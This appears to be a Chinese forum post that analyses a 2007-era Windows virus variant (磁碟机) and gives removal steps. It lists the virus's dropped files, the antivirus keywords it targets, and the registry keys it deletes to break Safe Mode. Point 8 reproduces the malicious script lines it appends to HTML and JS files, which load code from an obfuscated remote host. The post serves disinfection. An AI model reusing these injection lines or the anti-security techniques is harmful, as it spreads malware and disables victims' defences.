最近磁碟机新变种肆虐,此变种几乎把现有所有的安全工具都毙掉了,导致几乎全部不能使用,并且感染exe(包括rar中的exe文件)html等网页文件,js脚本文件,且十分顽固,采用进线程相互守护等多种技术,可谓罪恶多端的一个病毒。
下面为此病毒的简要分析和查杀方法
File: pagefile.pif Size: 88576 bytes Modified: 2007年12月28日, 16:55:16 MD5: 2C6F3E41B1E909E795B5BCE70B3A44CC SHA1: 3809D504ABC65D891CB0281BD9B599EA265C406C CRC32: 225B0B61
1.病毒运行后,生成如下文件 C:\WINDOWS\system32\Com\LSASS.EXE C:\WINDOWS\system32\Com\netcfg.000 C:\WINDOWS\system32\Com\netcfg.dll C:\WINDOWS\system32\Com\SMSS.EXE C:\WINDOWS\system32\894729.log C:\WINDOWS\system32\dnsq.dll C:\WINDOWS\system32\ntfsus.exe C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe 或者在C:\Documents and Settings\用户名\「开始」菜单\程序\启动下面
netcfg.dll负责注入IE并连接网络下载木马 并注册为浏览器加载项 [IfObj Control] {D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>
dnsq.dll会插入一些进程,并监控C:\WINDOWS\system32\Com\LSASS.EXE,如果该进程被结束,则立即恢复。 而且会监控~.exe,如果该文件被删除,立即重写。
894729.log即pagefile.pif文件 之中还会在C盘生成一个驱动,该驱动应该是用于提升权限所用 各个盘下面生成pagefile.pif和autorun.inf
2.通过查找窗口文字和和获得窗口线程进程ID等函数(GetWindowThreadProcessID)监控指定文字的窗口,之后会发送消息关闭窗口或者通过Terminate process函数结束进程,可能涉及的关键字如下: avast firewall 狙剑 bitdefender escan ewido *升级 sreng 介绍 monitor 微点 费尔 antivir 金山 360anti 360safe avg dr.web 云 墙 升 瑞 mcagent
最终的结果是很多安全工具和杀毒软件不能使用,包括我们常用的Xdelbox,sreng,Icesword以及Icesword修改版... 该部分具体分析还请各位大大们指点...
3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\boot.ini,C:\Windows\system32\drivers\hosts
C:\boot.ini不能写则Xdelbox等软件被废掉。
4.破坏安全模式 删除如下键 HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer(和安全模式有关?) HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
5.删除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run键
6.破坏显示隐藏文件 HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden改为0x00000000
7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件
8.感染非系统分区下面的htm,html等网页文件 在其尾部加入<script src="hxxp://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*"></script>的代码 感染js等脚本文件 在其尾部加入document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*'></sCrIpT>");的代码
查杀方法: 下载sreng和Icesword(可到down.45it.com下载)经过以上分析发现病毒十分顽固,但貌似强大的病毒背后却有着致命的弱点,它只通过~.exe启动自身,没有其他启动项,所以我们完全可以通过映像劫持处理这个病毒。
1.将下列文字复制到记事本中,并保存为.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~.exe] "Debugger"="清新阳光"
双击导入注册表 重启计算机
2.重启后我们会发现病毒被困死了^_^ 现在可以轻松的灭掉它们了
打开Icesword
点击左下角文件 按钮 删除如下文件 C:\WINDOWS\system32\Com\LSASS.EXE C:\WINDOWS\system32\Com\netcfg.000 C:\WINDOWS\system32\Com\netcfg.dll C:\WINDOWS\system32\Com\SMSS.EXE C:\WINDOWS\system32\894729.log C:\WINDOWS\system32\dnsq.dll C:\WINDOWS\system32\ntfsus.exe C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe(一定不要忘记) 或C:\Documents and Settings\用户名\「开始」菜单\程序\启动\~.exe 以及各个分区下面的pagefile.pif和autorun.inf
3.打开sreng 系统修复 - Windows Shell/Ie 全选 - 修复 系统修复 - 高级修复 修复安全模式
系统修复 — 浏览器加载项 删除[IfObj Control] {D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>
4.使用杀毒软件全盘杀毒,修复受感染的exe文件(如果杀毒软件暂不能认出这个病毒,请暂时不要打开非系统分区下的exe以及压缩包内的exe文件!!!)
5.修复受感染的htm等网页文件
|